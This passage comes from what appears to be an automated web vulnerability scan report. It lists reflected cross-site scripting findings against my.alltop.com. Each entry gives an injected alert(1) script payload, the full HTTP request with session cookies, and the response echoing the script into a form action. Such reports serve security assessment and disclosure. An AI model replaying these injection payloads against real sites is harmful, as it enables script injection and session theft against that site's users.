Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d/%2522ns%253D%2522netsparker%25280x00017B%2529)?4ed1c"><script>alert(1)</script>8a0b1056dd5=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.87. http://my.alltop.com/alpha/e ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001C1)</script> request parameter is copied into the HTML document as plain text between tags. The payload dc586<script>alert(1)</script>1f4389f38b1 was submitted in the '"--></style></script><script>netsparker(0x0001C1)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?'"--></style></script><script>netsparker(0x0001C1)</script>dc586<script>alert(1)</script>1f4389f38b1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>dc586<script>alert(1)</script>1f4389f38b1" method="post" accept-charset="utf-8">
...[SNIP]...

1.88. http://my.alltop.com/alpha/e [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e55"><script>alert(1)</script>72b10842109 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e90e55"><script>alert(1)</script>72b10842109 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e90e55"><script>alert(1)</script>72b10842109" method="post" accept-charset="utf-8">
...[SNIP]...

1.89. http://my.alltop.com/alpha/e [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5edd"><script>alert(1)</script>7b9bb1b6348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?f5edd"><script>alert(1)</script>7b9bb1b6348=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:49 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:49 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e?f5edd"><script>alert(1)</script>7b9bb1b6348=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.90. http://my.alltop.com/alpha/e [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39e45"><script>alert(1)</script>422134008b7 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012A)%3C/script%3E39e45"><script>alert(1)</script>422134008b7 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012A)%3C/script%3E39e45"><script>alert(1)</script>422134008b7" method="post" accept-charset="utf-8">
...[SNIP]...

1.91. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c70c"><script>alert(1)</script>707e2c2dcb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C2c70c"><script>alert(1)</script>707e2c2dcb3/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C2c70c"><script>alert(1)</script>707e2c2dcb3/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.92. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b23a"><script>alert(1)</script>7cee4595916 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C5b23a"><script>alert(1)</script>7cee4595916/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C5b23a"><script>alert(1)</script>7cee4595916/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.93. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a3a"><script>alert(1)</script>efc66f85147 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C81a3a"><script>alert(1)</script>efc66f85147/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:44 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:44 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C81a3a"><script>alert(1)</script>efc66f85147/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.94. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c6f"><script>alert(1)</script>f284e3eac00 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E76c6f"><script>alert(1)</script>f284e3eac00 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E76c6f"><script>alert(1)</script>f284e3eac00" method="post" accept-charset="utf-8">
...[SNIP]...

1.95. http://my.alltop.com/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ddb"><script>alert(1)</script>da6720f4a77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E?16ddb"><script>alert(1)</script>da6720f4a77=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
